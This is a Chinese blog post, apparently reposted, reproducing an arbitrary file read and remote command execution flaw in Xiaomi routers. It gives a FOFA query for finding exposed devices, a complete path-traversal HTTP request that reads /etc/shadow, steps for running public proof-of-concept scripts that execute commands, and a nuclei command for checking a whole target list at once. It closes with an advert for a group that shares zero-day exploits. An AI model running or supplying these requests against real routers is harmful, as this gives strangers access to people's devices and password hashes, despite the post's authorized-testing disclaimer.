漏洞复现 小米路由器 任意文件读取/远程命令执行漏洞
2022-11-18 13:34:24 Author: 阿乐你好(查看原文) 阅读量:67 收藏

0x01 阅读须知

融云安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!

0x02 漏洞描述

小米路由器是一款高配的智能路由器,具备强大的扩展,并且具备高速传输的特点,其传输速度最高可以达到866M,相比普通150M/300M的普通无线路由器具备更高无线传输速率。小米路由器系统存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,导致服务器失陷。

0x03 漏洞复现

fofa:app="小米路由器"

1.执行任意文件读取POC,读取etc/shadow文件,得到回显

GET /api-third-party/download/extdisks../etc/shadow HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0Accept-Encoding: gzip, deflate

2.使用github已公布poc,执行cat /etc/passwd命令,得到回显

1.poc地址https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC/blob/master/report/2.png
2.安装依赖pip3 install -r requirements.txt
3.读取stokpython arbitrary_file_read_vulnerability.py
4.执行命令python remote_command_execution_vulnerability.py

3.nuclei批量验证已发表于知识星球

nuclei.exe -t xiaomi_read.yaml -l subs.txt -stats

网络安全神兵利器分享
网络安全漏洞N/0day分享
    加入星球请扫描下方二维码,更多精,敬请期待!
👇👇👇


文章来源: http://mp.weixin.qq.com/s?__biz=MzIxNTIzNTExMQ==&mid=2247488658&idx=1&sn=c6a22b6956126fb14a4b11010284582a&chksm=979a3bdaa0edb2ccae9f4180c6736f3f6bf52f071b7c57cfecc0686a92bed1794c4a47feea7e#rd
如有侵权请联系:admin#unsafe.sh